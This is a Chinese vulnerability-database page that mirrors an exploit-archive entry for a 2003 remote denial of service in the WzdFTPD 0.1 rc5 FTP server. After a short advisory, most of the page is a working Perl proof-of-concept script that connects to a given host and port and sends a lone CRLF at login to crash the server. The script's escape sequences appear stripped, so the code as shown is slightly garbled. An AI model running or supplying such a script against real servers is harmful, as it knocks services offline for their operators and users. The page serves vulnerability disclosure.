WzdFTPD 0.1 rc5 – Login Remote Denial of Service

WzdFTPD 0.1 rc5 – Login Remote Denial of Service

漏洞ID 1054180 漏洞类型
发布时间 2003-09-23 更新时间 2003-09-23
图片[1]-WzdFTPD 0.1 rc5 – Login Remote Denial of Service-安全小百科CVE编号 N/A
图片[2]-WzdFTPD 0.1 rc5 – Login Remote Denial of Service-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/23169
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/8678/info

It has been reported that wzftpd is prone to a remote denial of service condition due to malicious user-supplied input. The problem is reported to present itself when a remote attacker sends a single CRLF character to the vulnerable program during the login process. This attack may cause the software to improperly handle the exceptional condition and lead to a crash.

Successful exploitation of this attack may allow a remote attacker to cause the vulnerable process to crash.

wzdftpd version 0.1rc5 has been reported to be prone to this vulnerability, however other version across various platforms may be affected as well. 

#!/usr/bin/perl
#
#   ####################################
#   #     Proof of concept for         #
#   # WZDFTPD FTP Server version 0.1rc5 #
#   ####################################
#
# http://www.moozatech.com/mt-23-09-2003.txt
#
# Usage: perl mooza1.pl [host] [port]
use IO::Socket;

$host = $ARGV[0];
$port = $ARGV[1];
print "n#####################################nn";
print "Proof-Of-Concept for wzdftpd v0.1rc5.n";
print "this code is for demonstration only.n";
print "Use it under your own responsebility.n";
print "n#####################################nn";

if (defined $host && defined $port ) {
} else {
  print "Oops, Something is missing.n";
  die "Usage: perl mooza1.pl [host] [port]n";
}

print "Connecting to $host:$port... ";

$socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port,
 Proto => "tcp", Type=> SOCK_STREAM) or die "Failed, Cant connect?n";
print "OKn";
sleep 1;
print "Sending Dos..n";
sleep 2;
print $socket "rn";
$socket->autoflush(1);

sleep 2;
print "we are done here..nn";
close($socket);

相关推荐: EFNet ircd Channel Keys Arbitrary Serve Command Vulnerability

EFNet ircd Channel Keys Arbitrary Serve Command Vulnerability 漏洞ID 1105160 漏洞类型 Input Validation Error 发布时间 1996-04-11 更新时间 1996-0…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享